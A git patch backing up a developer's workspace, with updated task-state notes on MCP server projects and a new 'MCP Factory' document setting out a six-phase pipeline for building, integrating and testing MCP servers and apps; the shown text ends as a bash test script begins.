From a2c95437c11f3b1bd169a93c77df8df42c56dfe7 Mon Sep 17 00:00:00 2001 From: Jake Shore Date: Wed, 4 Feb 2026 23:01:37 -0500 Subject: [PATCH] Daily backup: 2026-02-04 --- HEARTBEAT.md | 114 +- MCP-FACTORY.md | 572 +++ agent-repos-study-plan.md | 1497 ++++++++ factory-tools/README.md | 105 + factory-tools/mcp-inspector | 1 + factory-tools/mcp-validator | 1 + factory-tools/package.json | 16 + .../reports/compliance-2026-02-05.json | 194 + .../reports/compliance-2026-02-05.md | 37 + .../reports/discovery-2026-02-05.json | 126 + factory-tools/scripts/discover-all.mjs | 107 + .../scripts/fix-unknown-tool-error.mjs | 125 + factory-tools/scripts/validate-all.mjs | 127 + factory-tools/server-registry.json | 35 + .../test-configs/acuity-scheduling-tests.json | 174 + .../test-configs/acuity-scheduling.json | 12 + .../test-configs/bamboohr-tests.json | 113 + factory-tools/test-configs/bamboohr.json | 12 + .../test-configs/basecamp-tests.json | 150 + factory-tools/test-configs/basecamp.json | 13 + .../test-configs/bigcommerce-tests.json | 462 +++ factory-tools/test-configs/bigcommerce.json | 12 + factory-tools/test-configs/brevo-tests.json | 318 ++ factory-tools/test-configs/brevo.json | 11 + .../test-configs/calendly-tests.json | 143 + factory-tools/test-configs/calendly.json | 11 + factory-tools/test-configs/clickup-tests.json | 300 ++ factory-tools/test-configs/clickup.json | 11 + factory-tools/test-configs/close-tests.json | 554 +++ factory-tools/test-configs/close.json | 11 + factory-tools/test-configs/clover-tests.json | 217 ++ factory-tools/test-configs/clover.json | 14 + .../test-configs/constant-contact-tests.json | 367 ++ .../test-configs/constant-contact.json | 11 + .../test-configs/fieldedge-tests.json | 370 ++ factory-tools/test-configs/fieldedge.json | 12 + .../test-configs/freshbooks-tests.json | 358 ++ factory-tools/test-configs/freshbooks.json | 12 + .../test-configs/freshdesk-tests.json | 315 ++ factory-tools/test-configs/freshdesk.json | 12 + factory-tools/test-configs/gusto-tests.json | 86 + factory-tools/test-configs/gusto.json | 11 + .../test-configs/helpscout-tests.json | 287 ++ factory-tools/test-configs/helpscout.json | 11 + .../test-configs/housecall-pro-tests.json | 227 ++ factory-tools/test-configs/housecall-pro.json | 11 + factory-tools/test-configs/jobber-tests.json | 272 ++ factory-tools/test-configs/jobber.json | 11 + factory-tools/test-configs/keap-tests.json | 444 +++ factory-tools/test-configs/keap.json | 11 + .../test-configs/lightspeed-tests.json | 377 ++ factory-tools/test-configs/lightspeed.json | 12 + .../test-configs/mailchimp-tests.json | 156 + factory-tools/test-configs/mailchimp.json | 11 + .../test-configs/pipedrive-tests.json | 470 +++ factory-tools/test-configs/pipedrive.json | 11 + .../test-configs/rippling-tests.json | 179 + factory-tools/test-configs/rippling.json | 11 + .../test-configs/servicetitan-tests.json | 288 ++ factory-tools/test-configs/servicetitan.json | 13 + .../test-configs/squarespace-tests.json | 159 + factory-tools/test-configs/squarespace.json | 11 + factory-tools/test-configs/toast-tests.json | 188 + factory-tools/test-configs/toast.json | 13 + .../test-configs/touchbistro-tests.json | 250 ++ factory-tools/test-configs/touchbistro.json | 12 + factory-tools/test-configs/trello-tests.json | 346 ++ factory-tools/test-configs/trello.json | 12 + factory-tools/test-configs/wave-tests.json | 336 ++ factory-tools/test-configs/wave.json | 11 + factory-tools/test-configs/wrike-tests.json | 251 ++ factory-tools/test-configs/wrike.json | 11 + factory-tools/test-configs/zendesk-tests.json | 266 ++ factory-tools/test-configs/zendesk.json | 13 + manim-mcp | 1 + mcp-command-center/PIPELINE-OPERATOR.md | 118 + mcp-command-center/index.html | 1350 +++++++ mcp-command-center/state.json | 121 + .../acuity-scheduling/src/index.ts | 8 + .../mcp-servers/bamboohr/src/index.ts | 8 + .../mcp-servers/basecamp/src/index.ts | 8 + .../mcp-servers/bigcommerce/src/index.ts | 8 + mcp-diagrams/mcp-servers/brevo/src/index.ts | 8 + .../mcp-servers/calendly/src/index.ts | 8 + mcp-diagrams/mcp-servers/clickup/src/index.ts | 8 + mcp-diagrams/mcp-servers/close/src/index.ts | 8 + mcp-diagrams/mcp-servers/clover/src/index.ts | 8 + .../mcp-servers/constant-contact/src/index.ts | 8 + .../mcp-servers/fieldedge/src/index.ts | 8 + .../mcp-servers/freshbooks/src/index.ts | 8 + .../mcp-servers/freshdesk/src/index.ts | 8 + mcp-diagrams/mcp-servers/gusto/src/index.ts | 8 + .../mcp-servers/helpscout/src/index.ts | 8 + .../mcp-servers/housecall-pro/src/index.ts | 8 + mcp-diagrams/mcp-servers/jobber/src/index.ts | 8 + mcp-diagrams/mcp-servers/keap/src/index.ts | 8 + .../mcp-servers/lightspeed/src/index.ts | 8 + .../mcp-servers/mailchimp/src/index.ts | 8 + .../mcp-servers/pipedrive/src/index.ts | 8 + .../mcp-servers/rippling/src/index.ts | 8 + .../mcp-servers/servicetitan/src/index.ts | 8 + .../mcp-servers/squarespace/src/index.ts | 8 + mcp-diagrams/mcp-servers/toast/src/index.ts | 8 + .../mcp-servers/touchbistro/src/index.ts | 8 + mcp-diagrams/mcp-servers/trello/src/index.ts | 8 + mcp-diagrams/mcp-servers/wave/src/index.ts | 8 + mcp-diagrams/mcp-servers/wrike/src/index.ts | 8 + mcp-diagrams/mcp-servers/zendesk/src/index.ts | 8 + mcp-factory-reviews/BOSS-SYNTHESIS.md | 33 + mcp-factory-reviews/SYNTHESIS.md | 158 + mcp-factory-reviews/alpha-protocol-review.md | 470 +++ mcp-factory-reviews/beta-production-review.md | 547 +++ mcp-factory-reviews/boss-alexei-proposals.md | 816 ++++ mcp-factory-reviews/boss-kofi-proposals.md | 582 +++ mcp-factory-reviews/boss-mei-proposals.md | 786 ++++ mcp-factory-reviews/gamma-aiux-review.md | 792 ++++ mcp-jest.generated.json | 143 + memory/2026-02-04.md | 109 + memory/burton-method-research-intel.md | 34 +- memory/mcp-api-keys-progress.md | 74 + mixed-use-entertainment-intel.md | 29 +- openclaw-gallery/UPWORK_REFERENCE.md | 188 + .../pdfs/openclaw-capabilities.md | 194 + openclaw-gallery/pdfs/openclaw-packages.md | 200 + .../video/openclaw-promo/UPGRADE_SPEC.md | 31 + .../video/openclaw-promo/package.json | 27 + .../video/openclaw-promo/remotion.config.ts | 4 + .../openclaw-promo/src/OpenClawPromo.tsx | 147 + .../video/openclaw-promo/src/Root.tsx | 18 + .../src/components/AnimatedNumber.tsx | 38 + .../src/components/CanvasViewport.tsx | 67 + .../src/components/ChannelIcons.tsx | 58 + .../src/components/DrawLine.tsx | 45 + .../src/components/FadeSlideIn.tsx | 46 + .../src/components/GlassCard.tsx | 131 + .../src/components/KineticText.tsx | 142 + .../src/components/MeshBackground.tsx | 100 + .../src/components/ParticleField.tsx | 97 + .../src/components/StaggeredGrid.tsx | 51 + .../src/components/TypewriterText.tsx | 43 + .../video/openclaw-promo/src/index.ts | 4 + .../openclaw-promo/src/scenes/Scene10Cta.tsx | 199 + .../openclaw-promo/src/scenes/Scene1Hook.tsx | 256 ++ .../src/scenes/Scene2Problem.tsx | 406 ++ .../src/scenes/Scene3LogoReveal.tsx | 285 ++ .../src/scenes/Scene4MultiChannel.tsx | 359 ++ .../src/scenes/Scene5McpTools.tsx | 349 ++ .../src/scenes/Scene6ProductTour.tsx | 373 ++ .../src/scenes/Scene7PowerFeatures.tsx | 769 ++++ .../src/scenes/Scene8Architecture.tsx | 218 ++ .../src/scenes/Scene9Pricing.tsx | 183 + .../video/openclaw-promo/src/styles/theme.ts | 52 + .../video/openclaw-promo/tsconfig.json | 16 + pickle_history.txt | 1 + skills/mcp-api-analyzer/SKILL.md | 869 +++++ skills/mcp-app-designer/SKILL.md | 2170 +++++++++++ skills/mcp-apps-official/SKILL.md | 518 ++- skills/mcp-localbosses-integrator/SKILL.md | 1543 ++++++++ skills/mcp-qa-tester/SKILL.md | 3388 +++++++++++++++++ skills/mcp-server-builder/SKILL.md | 2609 +++++++++++++ trending-repos-deep-dive.md | 178 + 161 files changed, 34505 insertions(+), 100 deletions(-) create mode 100644 MCP-FACTORY.md create mode 100644 agent-repos-study-plan.md create mode 100644 factory-tools/README.md create mode 160000 factory-tools/mcp-inspector create mode 160000 factory-tools/mcp-validator create mode 100644 factory-tools/package.json create mode 100644 factory-tools/reports/compliance-2026-02-05.json create mode 100644 factory-tools/reports/compliance-2026-02-05.md create mode 100644 factory-tools/reports/discovery-2026-02-05.json create mode 100644 factory-tools/scripts/discover-all.mjs create mode 100644 factory-tools/scripts/fix-unknown-tool-error.mjs create mode 100644 factory-tools/scripts/validate-all.mjs create mode 100644 factory-tools/server-registry.json create mode 100644 factory-tools/test-configs/acuity-scheduling-tests.json create mode 100644 factory-tools/test-configs/acuity-scheduling.json create mode 100644 factory-tools/test-configs/bamboohr-tests.json create mode 100644 factory-tools/test-configs/bamboohr.json create mode 100644 factory-tools/test-configs/basecamp-tests.json create mode 100644 factory-tools/test-configs/basecamp.json create mode 100644 factory-tools/test-configs/bigcommerce-tests.json create mode 100644 factory-tools/test-configs/bigcommerce.json create mode 100644 factory-tools/test-configs/brevo-tests.json create mode 100644 factory-tools/test-configs/brevo.json create mode 100644 factory-tools/test-configs/calendly-tests.json create mode 100644 factory-tools/test-configs/calendly.json create mode 100644 factory-tools/test-configs/clickup-tests.json create mode 100644 factory-tools/test-configs/clickup.json create mode 100644 factory-tools/test-configs/close-tests.json create mode 100644 factory-tools/test-configs/close.json create mode 100644 factory-tools/test-configs/clover-tests.json create mode 100644 factory-tools/test-configs/clover.json create mode 100644 factory-tools/test-configs/constant-contact-tests.json create mode 100644 factory-tools/test-configs/constant-contact.json create mode 100644 factory-tools/test-configs/fieldedge-tests.json create mode 100644 factory-tools/test-configs/fieldedge.json create mode 100644 factory-tools/test-configs/freshbooks-tests.json create mode 100644 factory-tools/test-configs/freshbooks.json create mode 100644 factory-tools/test-configs/freshdesk-tests.json create mode 100644 factory-tools/test-configs/freshdesk.json create mode 100644 factory-tools/test-configs/gusto-tests.json create mode 100644 factory-tools/test-configs/gusto.json create mode 100644 factory-tools/test-configs/helpscout-tests.json create mode 100644 factory-tools/test-configs/helpscout.json create mode 100644 factory-tools/test-configs/housecall-pro-tests.json create mode 100644 factory-tools/test-configs/housecall-pro.json create mode 100644 factory-tools/test-configs/jobber-tests.json create mode 100644 factory-tools/test-configs/jobber.json create mode 100644 factory-tools/test-configs/keap-tests.json create mode 100644 factory-tools/test-configs/keap.json create mode 100644 factory-tools/test-configs/lightspeed-tests.json create mode 100644 factory-tools/test-configs/lightspeed.json create mode 100644 factory-tools/test-configs/mailchimp-tests.json create mode 100644 factory-tools/test-configs/mailchimp.json create mode 100644 factory-tools/test-configs/pipedrive-tests.json create mode 100644 factory-tools/test-configs/pipedrive.json create mode 100644 factory-tools/test-configs/rippling-tests.json create mode 100644 factory-tools/test-configs/rippling.json create mode 100644 factory-tools/test-configs/servicetitan-tests.json create mode 100644 factory-tools/test-configs/servicetitan.json create mode 100644 factory-tools/test-configs/squarespace-tests.json create mode 100644 factory-tools/test-configs/squarespace.json create mode 100644 factory-tools/test-configs/toast-tests.json create mode 100644 factory-tools/test-configs/toast.json create mode 100644 factory-tools/test-configs/touchbistro-tests.json create mode 100644 factory-tools/test-configs/touchbistro.json create mode 100644 factory-tools/test-configs/trello-tests.json create mode 100644 factory-tools/test-configs/trello.json create mode 100644 factory-tools/test-configs/wave-tests.json create mode 100644 factory-tools/test-configs/wave.json create mode 100644 factory-tools/test-configs/wrike-tests.json create mode 100644 factory-tools/test-configs/wrike.json create mode 100644 factory-tools/test-configs/zendesk-tests.json create mode 100644 factory-tools/test-configs/zendesk.json create mode 160000 manim-mcp create mode 100644 mcp-command-center/PIPELINE-OPERATOR.md create mode 100644 mcp-command-center/index.html create mode 100644 mcp-command-center/state.json create mode 100644 mcp-factory-reviews/BOSS-SYNTHESIS.md create mode 100644 mcp-factory-reviews/SYNTHESIS.md create mode 100644 mcp-factory-reviews/alpha-protocol-review.md create mode 100644 mcp-factory-reviews/beta-production-review.md create mode 100644 mcp-factory-reviews/boss-alexei-proposals.md create mode 100644 mcp-factory-reviews/boss-kofi-proposals.md create mode 100644 mcp-factory-reviews/boss-mei-proposals.md create mode 100644 mcp-factory-reviews/gamma-aiux-review.md create mode 100644 mcp-jest.generated.json create mode 100644 memory/2026-02-04.md create mode 100644 memory/mcp-api-keys-progress.md create mode 100644 openclaw-gallery/UPWORK_REFERENCE.md create mode 100644 openclaw-gallery/pdfs/openclaw-capabilities.md create mode 100644 openclaw-gallery/pdfs/openclaw-packages.md create mode 100644 openclaw-gallery/video/openclaw-promo/UPGRADE_SPEC.md create mode 100644 openclaw-gallery/video/openclaw-promo/package.json create mode 100644 openclaw-gallery/video/openclaw-promo/remotion.config.ts create mode 100644 openclaw-gallery/video/openclaw-promo/src/OpenClawPromo.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/Root.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/components/AnimatedNumber.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/components/CanvasViewport.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/components/ChannelIcons.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/components/DrawLine.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/components/FadeSlideIn.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/components/GlassCard.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/components/KineticText.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/components/MeshBackground.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/components/ParticleField.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/components/StaggeredGrid.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/components/TypewriterText.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/index.ts create mode 100644 openclaw-gallery/video/openclaw-promo/src/scenes/Scene10Cta.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/scenes/Scene1Hook.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/scenes/Scene2Problem.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/scenes/Scene3LogoReveal.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/scenes/Scene4MultiChannel.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/scenes/Scene5McpTools.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/scenes/Scene6ProductTour.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/scenes/Scene7PowerFeatures.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/scenes/Scene8Architecture.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/scenes/Scene9Pricing.tsx create mode 100644 openclaw-gallery/video/openclaw-promo/src/styles/theme.ts create mode 100644 openclaw-gallery/video/openclaw-promo/tsconfig.json create mode 100644 skills/mcp-api-analyzer/SKILL.md create mode 100644 skills/mcp-app-designer/SKILL.md create mode 100644 skills/mcp-localbosses-integrator/SKILL.md create mode 100644 skills/mcp-qa-tester/SKILL.md create mode 100644 skills/mcp-server-builder/SKILL.md create mode 100644 trending-repos-deep-dive.md diff --git a/HEARTBEAT.md b/HEARTBEAT.md index 6a6e96e..5c633b5 100644 --- a/HEARTBEAT.md +++ b/HEARTBEAT.md @@ -1,85 +1,72 @@ # HEARTBEAT.md — Active Task State ## Current Task -- **Project:** LocalBosses App — MCP Server Integration Sprint -- **Last completed:** Built 4 new MCP servers (CloseBot, Meta Ads, Google Console, Twilio), shipped multi-panel thread system, fixed critical bugs, integrated Reonomy -- **Next step:** SongSense build (queued but hasn't started), live API testing for MCP servers, thread app expansion feature -- **Blockers:** Expired Anthropic API key in localbosses-app .env.local (competitor-research channel broken) +- **Project:** MCP Pipeline Factory + OpenClaw Upwork Launch +- **Last completed:** MCP Pipeline operator system (7 channels, 2 cron jobs, state.json), 8-week agent study plan (1,497 lines), CloseBot MCP (119 tools), factory testing infrastructure (30/30 servers 100% compliant), Das genre universe animation, OpenClaw gallery assets +- **Next step:** Jake reviewing OpenClaw video + gallery → Upwork listing, testing strategy decision for 8→9 advancement +- **Blockers:** Expired Anthropic API key in localbosses-app .env.local, testing strategy decision pending ## Active Projects -### LocalBosses App (PRIMARY — ACTIVE) +### MCP Pipeline Factory (PRIMARY — ACTIVE) +- **Location:** `mcp-command-center/` +- **Status:** Fully operational — autonomous operator mode +- **Discord channels:** 7 channels in "MCP PIPELINE" category +- **Cron jobs:** Daily standup 9 AM, heartbeat every 2 hours +- **State:** 35 MCPs at Stage 8 (Integration Complete) +- **Pending:** Testing strategy decision (dec-001) — no reaction yet +- **Dashboard:** `http://192.168.0.25:8888` + +### OpenClaw Upwork Service Launch +- **Location:** `openclaw-gallery/` +- **Status:** All assets complete, awaiting Jake review +- **Assets:** 15 graphics, 6 mockups, 2 PDFs, 90-sec Remotion video +- **Pricing:** $2,499 / $7,499 / $24,999 tiers finalized +- **Next:** Upwork listing finalization after Jake approves video + +### LocalBosses App - **Location:** `localbosses-app/` -- **Status:** Major feature sprint completed 2/3 -- **Channel architecture:** - - BUSINESS OPS: #general, #automations, #crm, #google-ads, #competitor-research, #twilio - - MARKETING: #google-console, #meta-ads - - TOOLS: #templates, #nodes - - SYSTEM: #health -- **Multi-panel threads:** Shipped — 4-6 simultaneous, cross-channel persistent -- **All bugs fixed:** Channel switch blank screen, workflow builder data flow, thread persistence -- **Dev server:** `192.168.0.25:3000` (Next.js 16.1.6 + Turbopack) -- **TODO:** - - Thread app expansion (iframe covers top section with real data) - - Reonomy route.ts mapping (APP_DIRS + APP_NAME_MAP) - - Cold start fix (10-15s first request) - - Fix expired Anthropic API key +- **Status:** Major feature sprint completed, all bugs fixed +- **Dev server:** `192.168.0.25:3000` +- **Blocker:** Expired Anthropic API key in .env.local -### New MCP Servers (Built 2/3) -- **CloseBot MCP** — `closebot-mcp/` — 119 tools, 14 modules, 6 UI apps -- **Meta Ads MCP** — `meta-ads-mcp/` — ~55 tools, 11 categories, 11 UI apps -- **Google Console MCP** — `google-console-mcp/` — 22 tools, 5 UI apps -- **Twilio MCP** — 54 tools, 19 UI apps (integrated into LocalBosses) -- **All compile clean, none tested against live APIs yet** +### CloseBot MCP (NEW — COMPLETE) +- **Location:** `closebot-mcp/` +- **Status:** 119 tools, 4,656 lines, compiles clean +- **Needs:** CLOSEBOT_API_KEY env var for live testing -### MCP Servers (30 built earlier, all compiled) -- **Location:** `mcp-diagrams/mcp-servers/` -- **Status:** All 30 built with TypeScript → dist, ~240 tools total -- **Next:** Test against live APIs, write READMEs, publish to GitHub +### Factory Testing Infrastructure (NEW — COMPLETE) +- **Location:** `factory-tools/` +- **Status:** All 30 servers patched and rebuilt, 100/100 compliance +- **Tools:** mcp-jest, mcp-validator, mcp-add, MCP Inspector +- **Ready:** 702 test cases for live API testing (needs API keys) + +### 8-Week Agent Study Plan (NEW — COMPLETE) +- **Location:** `agent-repos-study-plan.md` +- **Status:** 1,497 lines, posted to #trending-agent-repos +- **Curriculum:** Pydantic-AI → MS Agent Framework → Agent-S → GPT Researcher → Yao → MetaGPT → ElizaOS → Capstone ### SongSense — AI Music Analysis Product (QUEUED) -- **Status:** Full architecture designed, Jake approved, but build hasn't started -- **Next step:** Build with paired agent teams (groups of 2, double-checking each other) -- **Priority:** Was supposed to be top priority but LocalBosses sprint took over +- **Status:** Full architecture designed, Jake approved, build hasn't started +- **Priority:** Still queued behind current sprint + +### MCP Servers (30 built earlier + 5 new) +- **Status:** 35 total, all at Stage 8, all compile clean +- **New:** CloseBot, Meta Ads, Google Console, Twilio, plus others ### GHL MCP Apps (65 apps — COMPLETE) - **Location:** `mcp-diagrams/GoHighLevel-MCP/src/ui/react-app/src/apps/` -- **Status:** All 65 built, 3 review rounds done, all builds passing -- **Integrated into:** LocalBosses app CRM channel (toolbar + thread system) +- **Status:** All 65 built, integrated into LocalBosses CRM channel -### GoHighLevel-MCP (main repo) -- **Location:** `mcp-diagrams/GoHighLevel-MCP/` -- **Repo:** `github.com/BusyBee3333/Go-High-Level-MCP-2026-Complete.git` -- **Status:** Uncommitted changes — new app-ui, apps system, server-lite, server-apps -- **Next:** Commit & push changes - -### MCP Business Research -- **Location:** `mcp-diagrams/` -- **Key finding:** 22 of 30 targets have ZERO MCP competition -- **Revenue projections:** $4-7.6M ARR at 24 months - -### MCP Animation Framework (Remotion) -- **Location:** `mcp-diagrams/mcp-animation-framework/` -- **Status:** Dolly camera version built -- **Next:** Get feedback on camera movement, iterate +## Das Projects +- **Genre Universe Animation:** Delivered to #manim (1080p60, 30 sequences) +- **Server Icon:** Set via Discord API ## Other Active Projects -### Reonomy Scraper v13 -- **Location:** workspace root -- **Status:** Production scraper built, also integrated as MCP + LocalBosses channel - ### Burton Method Research Intel - **Location:** `memory/burton-method-research-intel.md` -- **Status:** Ongoing competitor + EdTech trends tracking - -### Das Management -- **Folders:** `das-forum-form/`, `das-surya/`, `das-threads/`, `das-website/` -- **Das Surya Album Review:** Complete (`das-surya-review/`) - -### Genre Universe 3D Viz (Das) -- **Location:** `genre-viz/` -- **Status:** Built — Three.js interactive visualization +- **Status:** Updated Feb 4 — 7Sage reversal, Preply $150M raise ### Smart Model Routing - **Status:** Active — Sonnet default, auto-escalate to Opus @@ -87,8 +74,7 @@ ## Git Status - **Workspace repo:** `github.com/BusyBee3333/clawdbot-workspace.git` -- **GHL-MCP submodule:** Uncommitted changes - **Pending:** Daily backup commit --- -*Last updated: 2026-02-03 23:00 EST* +*Last updated: 2026-02-04 23:00 EST* diff --git a/MCP-FACTORY.md b/MCP-FACTORY.md new file mode 100644 index 0000000..5f8462c --- /dev/null +++ b/MCP-FACTORY.md @@ -0,0 +1,572 @@ +# MCP Factory — Production Pipeline + +> The systematic process for turning any API into a fully tested, production-ready MCP experience inside LocalBosses. + +--- + +## The Problem + +We've been building MCP servers ad-hoc: grab an API, bang out tools, create some apps, throw them in LocalBosses, move on. Result: 30+ servers that compile but have never been tested against live APIs, apps that may not render, tool descriptions that might not trigger correctly via natural language. + +## The Pipeline + +``` +API Docs → Analyze → Build → Design → Integrate → Test → Ship + P1 P2 P3 P4 P5 P6 +``` + +> **6 phases.** Agents 2 (Build) and 3 (Design) run in parallel. QA findings route back to Builder/Designer for fixes before Ship. + +Every phase has: +- **Clear inputs** (what you need to start) +- **Clear outputs** (what you produce) +- **Quality gate** (what must pass before moving on) +- **Dedicated skill** (documented, repeatable instructions) +- **Agent capability** (can be run by a sub-agent) + +--- + +## Phase 1: Analyze (API Discovery & Analysis) + +**Skill:** `mcp-api-analyzer` +**Input:** API documentation URL(s), OpenAPI spec (if available), user guides, public marketing copy +**Output:** `{service}-api-analysis.md` + +### What the analysis produces: +1. **Service Overview** — What the product does, who it's for, pricing tiers +2. **Auth Method** — OAuth2 / API key / JWT / session — with exact flow +3. **Endpoint Catalog** — Every endpoint grouped by domain +4. **Tool Groups** — Logical groupings for lazy loading (aim for 5-15 groups) +5. **Tool Inventory** — Each tool with: + - Name (snake_case, descriptive) + - Description (optimized for LLM routing — what it does, when to use it) + - Required vs optional params + - Read-only / destructive / idempotent annotations +6. **App Candidates** — Which endpoints/features deserve visual UI: + - Dashboard views (aggregate data, KPIs) + - List/Grid views (searchable collections) + - Detail views (single entity deep-dive) + - Forms (create/edit workflows) + - Specialized views (calendars, timelines, funnels, maps) +7. **Rate Limits & Quirks** — API-specific gotchas + +### Quality Gate: +- [ ] Every endpoint is cataloged +- [ ] Tool groups are balanced (no group with 50+ tools) +- [ ] Tool descriptions are LLM-friendly (action-oriented, include "when to use") +- [ ] App candidates have clear data sources (which tools feed them) +- [ ] Auth flow is documented with example + +--- + +## Phase 2: Build (MCP Server) + +**Skill:** `mcp-server-builder` (updated from existing `mcp-server-development`) +**Input:** `{service}-api-analysis.md` +**Output:** Complete MCP server in `{service}-mcp/` + +### Server structure: +``` +{service}-mcp/ +├── src/ +│ ├── index.ts # Server entry, transport, lazy loading +│ ├── client.ts # API client (auth, request, error handling) +│ ├── tools/ +│ │ ├── index.ts # Tool registry + lazy loader +│ │ ├── {group1}.ts # Tool group module +│ │ ├── {group2}.ts # ... +│ │ └── ... +│ └── types.ts # Shared TypeScript types +├── dist/ # Compiled output +├── package.json +├── tsconfig.json +├── .env.example +└── README.md +``` + +### Must-haves (Feb 2026 standard): +- **MCP SDK `^1.26.0`** (security fix: GHSA-345p-7cg4-v4c7 in v1.26.0). Pin to v1.x — SDK v2 is pre-alpha, stable expected Q1 2026 +- **Lazy loading** — tool groups load on first use, not at startup +- **MCP Annotations** on every tool: + - `readOnlyHint` (true for GET operations) + - `destructiveHint` (true for DELETE operations) + - `idempotentHint` (true for PUT/upsert operations) + - `openWorldHint` (false for most API tools) +- **Zod validation** on all tool inputs +- **Structured error handling** — never crash, always return useful error messages +- **Rate limit awareness** — respect API limits, add retry logic +- **Pagination support** — tools that list things must handle pagination +- **Environment variables** — all secrets via env, never hardcoded +- **TypeScript strict mode** — no `any`, proper types throughout + +### Quality Gate: +- [ ] `npm run build` succeeds (tsc compiles clean) +- [ ] Every tool has MCP annotations +- [ ] Every tool has Zod input validation +- [ ] .env.example lists all required env vars +- [ ] README documents setup + tool list + +--- + +## Phase 3: Design (MCP Apps) + +**Skill:** `mcp-app-designer` +**Input:** `{service}-api-analysis.md` (app candidates section), server tool definitions +**Output:** HTML app files in `{service}-mcp/app-ui/` or `{service}-mcp/ui/` + +### App types and when to use them: + +| Type | When | Example | +|------|------|---------| +| **Dashboard** | Aggregate KPIs, overview | CRM Dashboard, Ad Performance | +| **Data Grid** | Searchable/filterable lists | Contact List, Order History | +| **Detail Card** | Single entity deep-dive | Contact Card, Invoice Preview | +| **Form/Wizard** | Create or edit flows | Campaign Builder, Appointment Booker | +| **Timeline** | Chronological events | Activity Feed, Audit Log | +| **Funnel/Flow** | Stage-based progression | Pipeline Board, Sales Funnel | +| **Calendar** | Date-based data | Appointment Calendar, Schedule View | +| **Analytics** | Charts and visualizations | Revenue Chart, Traffic Graph | + +### App architecture (single-file HTML): +```html + + + + + + +
+ + + +``` + +### Design rules: +- **Dark theme only** — `#1a1d23` background, `#2b2d31` cards, `#ff6d5a` accent, `#dcddde` text +- **Responsive** — must work from 280px to 800px width +- **Self-contained** — zero external dependencies, no CDN links +- **Three states** — loading skeleton, empty state, data state +- **Compact** — no wasted space, dense but readable +- **Interactive** — hover effects, click handlers where appropriate +- **Data-driven** — renders whatever data it receives, graceful with missing fields + +### Quality Gate: +- [ ] Every app renders with sample data (no blank screens) +- [ ] Every app has loading, empty, and error states +- [ ] Dark theme is consistent with LocalBosses +- [ ] Works at 280px width (thread panel minimum) +- [ ] No external dependencies or CDN links + +--- + +## Phase 4: Integrate (LocalBosses) + +**Skill:** `mcp-localbosses-integrator` +**Input:** Built MCP server + apps +**Output:** Fully wired LocalBosses channel + +### Files to update: + +1. **`src/lib/channels.ts`** — Add channel definition: + ```typescript + { + id: "channel-name", + name: "Channel Name", + icon: "🔥", + category: "BUSINESS OPS", // or MARKETING, TOOLS, SYSTEM + description: "What this channel does", + systemPrompt: `...`, // Must include tool descriptions + when to use them + defaultApp: "app-id", // Optional: auto-open app + mcpApps: ["app-id-1", "app-id-2", ...], + } + ``` + +2. **`src/lib/appNames.ts`** — Add display names: + ```typescript + "app-id": { name: "App Name", icon: "📊" }, + ``` + +3. **`src/lib/app-intakes.ts`** — Add intake questions: + ```typescript + "app-id": { + question: "What would you like to see?", + category: "data-view", + skipLabel: "Show dashboard", + }, + ``` + +4. **`src/app/api/mcp-apps/route.ts`** — Add app routing: + ```typescript + // In APP_NAME_MAP: + "app-id": "filename-without-html", + // In APP_DIRS (if in a different location): + path.join(process.cwd(), "path/to/app-ui"), + ``` + +5. **`src/app/api/chat/route.ts`** — Add tool routing: + - System prompt must know about the tools + - Tool results should include `` blocks + - Or `` for workflow-type apps + +### System prompt engineering: +The channel system prompt is CRITICAL. It must: +- Describe the tools available in natural language +- Specify when to use each tool (not just what they do) +- Include the hidden data block format so the AI returns structured data to apps +- Set the tone and expertise level + +### Quality Gate: +- [ ] Channel appears in sidebar under correct category +- [ ] All apps appear in toolbar +- [ ] Default app auto-opens on channel entry (if configured) +- [ ] System prompt mentions all available tools +- [ ] Intake questions are clear and actionable + +--- + +## Phase 5: Test (QA & Validation) + +**Skill:** `mcp-qa-tester` +**Input:** Integrated LocalBosses channel +**Output:** Test report + fixes + +### Testing layers: + +#### Layer 1: Static Analysis +- TypeScript compiles clean (`tsc --noEmit`) +- No `any` types in tool handlers +- All apps are valid HTML (no unclosed tags, no script errors) +- All routes resolve (no 404s for app files) + +#### Layer 2: Visual Testing (Peekaboo + Gemini) +```bash +# Capture the rendered app +peekaboo capture --app "Safari" --format png --output /tmp/test-{app}.png + +# Or use browser tool to screenshot +# browser → screenshot → analyze with Gemini + +# Gemini multimodal analysis +gemini "Analyze this screenshot of an MCP app. Check: +1. Does it render correctly (no blank screen, no broken layout)? +2. Is the dark theme consistent (#1a1d23 bg, #ff6d5a accent)? +3. Are there proper loading/empty states? +4. Is it responsive-friendly? +5. Any visual bugs?" -f /tmp/test-{app}.png +``` + +#### Layer 3: Functional Testing +- **Tool invocation:** Send natural language messages, verify correct tool is triggered +- **Data flow:** Send a message → verify AI returns APP_DATA block → verify app receives data +- **Thread lifecycle:** Create thread → interact → close → delete → verify cleanup +- **Cross-channel:** Open app from one channel, switch channels, come back — does state persist? + +#### Layer 4: Live API Testing (when credentials available) +- Authenticate with real API credentials +- Call each tool with real parameters +- Verify response shapes match what apps expect +- Test error cases (invalid IDs, missing permissions, rate limits) + +#### Layer 5: Integration Testing +- Full flow: user sends message → AI responds → app renders → user interacts in thread +- Test with 2-3 realistic use cases per channel + +### Automated test script pattern: +```bash +#!/bin/bash +# 